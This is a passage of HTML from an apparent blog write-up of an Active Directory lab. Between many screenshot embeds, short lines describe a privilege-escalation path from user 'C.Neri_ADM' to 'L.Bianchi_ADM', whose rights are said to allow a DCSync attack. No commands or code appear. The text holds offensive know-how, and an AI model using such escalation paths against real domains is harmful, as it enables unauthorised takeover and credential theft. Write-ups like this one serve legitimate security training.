height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Oops, dosn&#8217;t have anything!!!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!D7Dr!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!D7Dr!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!D7Dr!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!D7Dr!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!D7Dr!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!D7Dr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:108560,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!D7Dr!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!D7Dr!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!D7Dr!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!D7Dr!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7626d645-c749-4c5e-a70d-2476e8fb7047_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But we have connections with User L.Bianchi_ADM:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!n_hI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!n_hI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!n_hI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!n_hI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!n_hI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!n_hI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:182489,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff391dabb-f4da-474c-a97b-e25064278ff0_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!n_hI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!n_hI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!n_hI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!n_hI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F87045ef5-4308-48a4-9cdd-74c7bac98a09_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And L.Bianchi_ADM user have. . .93!! OOB:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!m5YQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!m5YQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!m5YQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!m5YQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!m5YQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!m5YQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:177814,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F18a92fcb-2b3f-4293-a686-a7abfdc5827a_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!m5YQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!m5YQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!m5YQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!m5YQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F347bbece-874f-4c59-8ec4-6d39c4f57c97_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Basically a GOD!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!upBW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!upBW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!upBW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!upBW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!upBW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!upBW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:301980,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe3abf242-d056-4b9b-a694-60ddab79fa5e_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!upBW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!upBW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!upBW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!upBW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F475ba533-7369-4002-9b25-d6d1837dd9a2_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Which basically an Admin rights power:</p><ul><li><p>DCSycn attack</p></li><li><p>Etc</p></li></ul><p>So &#8220;C.Neri_ADM&#8221; user have paths to &#8220;L.Bianchi_ADM&#8221; user:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RlCI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RlCI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!RlCI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!RlCI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!RlCI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RlCI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:118507,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RlCI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!RlCI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!RlCI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!RlCI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F80a102b8-051d-499e-ab05-c7aaa0426c63_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!t4cL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!t4cL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!t4cL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!t4cL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!t4cL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!t4cL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png" width="1590" height="965" 